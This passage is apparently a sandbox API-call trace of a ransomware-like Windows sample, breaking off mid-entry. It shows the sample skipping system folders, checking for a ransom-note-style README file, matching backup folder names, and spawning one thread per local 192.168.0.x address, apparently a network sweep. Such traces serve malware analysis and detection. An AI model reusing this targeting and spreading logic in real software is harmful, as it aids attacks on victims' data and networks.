0x19 [0168.944] _wcsicmp (_Str1="tor browser", _Str2="Public") returned 4 [0168.945] wcslen (_String="tor browser") returned 0xb [0168.945] _wcsicmp (_Str1="windows.old", _Str2="Public") returned 7 [0168.945] wcslen (_String="windows.old") returned 0xb [0168.945] _wcsicmp (_Str1="intel", _Str2="Public") returned -7 [0168.945] wcslen (_String="intel") returned 0x5 [0168.945] _wcsicmp (_Str1="msocache", _Str2="Public") returned -3 [0168.945] wcslen (_String="msocache") returned 0x8 [0168.945] _wcsicmp (_Str1="perflogs", _Str2="Public") returned -16 [0168.945] wcslen (_String="perflogs") returned 0x8 [0168.945] _wcsicmp (_Str1="x64dbg", _Str2="Public") returned 8 [0168.945] wcslen (_String="x64dbg") returned 0x6 [0168.945] _wcsicmp (_Str1="public", _Str2="Public") returned 0 [0168.945] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x878a4820, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x878a4820, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x878a4820, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0168.945] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0168.945] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.945] FindClose (in: hFindFile=0x152f58 | out: hFindFile=0x152f58) returned 1 [0168.945] _wcsicmp (_Str1="backup", _Str2="Users") returned -19 [0168.945] wcslen (_String="backup") returned 0x6 [0168.945] _wcsicmp (_Str1="bak", _Str2="Users") returned -19 [0168.945] wcslen (_String="bak") returned 0x3 [0168.945] _wcsicmp (_Str1="back", _Str2="Users") returned -19 [0168.945] wcslen (_String="back") returned 0x4 [0168.945] _wcsicmp (_Str1="archive", _Str2="Users") returned -20 [0168.945] wcslen (_String="archive") returned 0x7 [0168.945] _wcsicmp (_Str1="bckp", _Str2="Users") returned -19 [0168.945] wcslen (_String="bckp") returned 0x4 [0168.945] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x18efe0) returned 1 [0168.947] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x19efe8) returned 1 [0168.947] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0168.947] _wcsicmp (_Str1="$recycle.bin", _Str2="Windows") returned -83 [0168.947] wcslen (_String="$recycle.bin") returned 0xc [0168.947] _wcsicmp (_Str1="config.msi", _Str2="Windows") returned -20 [0168.947] wcslen (_String="config.msi") returned 0xa [0168.947] _wcsicmp (_Str1="$windows.~bt", _Str2="Windows") returned -83 [0168.947] wcslen (_String="$windows.~bt") returned 0xc [0168.947] _wcsicmp (_Str1="$windows.~ws", _Str2="Windows") returned -83 [0168.947] wcslen (_String="$windows.~ws") returned 0xc [0168.947] _wcsicmp (_Str1="windows", _Str2="Windows") returned 0 [0168.947] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.947] FindClose (in: hFindFile=0x152ed8 | out: hFindFile=0x152ed8) returned 1 [0168.947] _wcsicmp (_Str1="backup", _Str2="C:") returned -1 [0168.947] wcslen (_String="backup") returned 0x6 [0168.947] _wcsicmp (_Str1="bak", _Str2="C:") returned -1 [0168.948] wcslen (_String="bak") returned 0x3 [0168.948] _wcsicmp (_Str1="back", _Str2="C:") returned -1 [0168.948] wcslen (_String="back") returned 0x4 [0168.948] _wcsicmp (_Str1="archive", _Str2="C:") returned -2 [0168.948] wcslen (_String="archive") returned 0x7 [0168.948] _wcsicmp (_Str1="bckp", _Str2="C:") returned -1 [0168.948] wcslen (_String="bckp") returned 0x4 [0168.948] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1561c0) returned 1 [0168.948] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1661c8) returned 1 [0168.948] Sleep (dwMilliseconds=0x64) [0169.052] Sleep (dwMilliseconds=0x64) [0169.159] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0169.159] WaitForMultipleObjects (nCount=0x8, lpHandles=0xcb1048*=0x13c, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0169.175] CloseHandle (hObject=0x13c) returned 1 [0169.175] CloseHandle (hObject=0x140) returned 1 [0169.175] CloseHandle (hObject=0x144) returned 1 [0169.175] CloseHandle (hObject=0x148) returned 1 [0169.175] CloseHandle (hObject=0x14c) returned 1 [0169.175] CloseHandle (hObject=0x150) returned 1 [0169.175] CloseHandle (hObject=0x154) returned 1 [0169.175] CloseHandle (hObject=0x158) returned 1 [0169.175] CloseHandle (hObject=0x130) returned 1 [0169.175] CloseHandle (hObject=0xd8) returned 1 [0169.176] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x32f7ec | out: lpWSAData=0x32f7ec) returned 0 [0169.183] GetAdaptersInfo (in: AdapterInfo=0x0, SizePointer=0x32f7c4 | out: AdapterInfo=0x0, SizePointer=0x32f7c4) returned 0x6f [0169.605] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x280) returned 0x153db8 [0169.605] GetAdaptersInfo (in: AdapterInfo=0x153db8, SizePointer=0x32f7c4 | out: AdapterInfo=0x153db8, SizePointer=0x32f7c4) returned 0x0 [0169.607] inet_addr (cp="192.168.0.28") returned 0x1c00a8c0 [0169.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0xa8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0169.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0169.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0169.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b0 [0169.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0169.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c8 [0169.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c [0169.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0169.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x190 [0169.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0169.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0xa00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x19c [0169.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0xb00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1cc [0169.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0xc00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0169.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0xd00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0169.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0xe00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b4 [0169.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0xf00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0169.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c [0169.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c0 [0169.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1dc [0169.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0169.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0169.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0169.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f4 [0169.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0169.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f0 [0169.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d0 [0169.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0169.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0169.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0169.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1fc [0169.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x1f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f8 [0169.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x278 [0169.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x27c [0169.647] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0169.648] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0169.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x288 [0169.650] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x28c [0169.650] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0169.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x294 [0169.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x298 [0169.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x29c [0169.654] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0169.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a4 [0169.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a8 [0169.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ac [0169.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b0 [0169.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x2f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b4 [0169.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b8 [0169.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2bc [0169.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0169.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c4 [0169.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c8 [0169.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2cc [0169.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d0 [0169.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d4 [0169.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d8 [0169.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2dc [0169.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e0 [0169.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e4 [0169.670] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e8 [0169.670] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ec [0169.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0169.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x3f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f4 [0169.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f8 [0169.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2fc [0169.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x300 [0169.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x304 [0169.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0169.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x30c [0169.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x310 [0169.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x314 [0169.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3b8 [0169.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0169.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c0 [0169.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c4 [0169.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c8 [0169.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3cc [0169.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d0 [0169.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x4f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0169.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d8 [0169.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3dc [0169.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0169.720] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e4 [0169.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e8 [0169.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3ec [0169.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0169.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f4 [0169.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f8 [0169.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3fc [0169.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x404 [0169.726] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x408 [0169.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x40c [0169.728] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x410 [0169.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 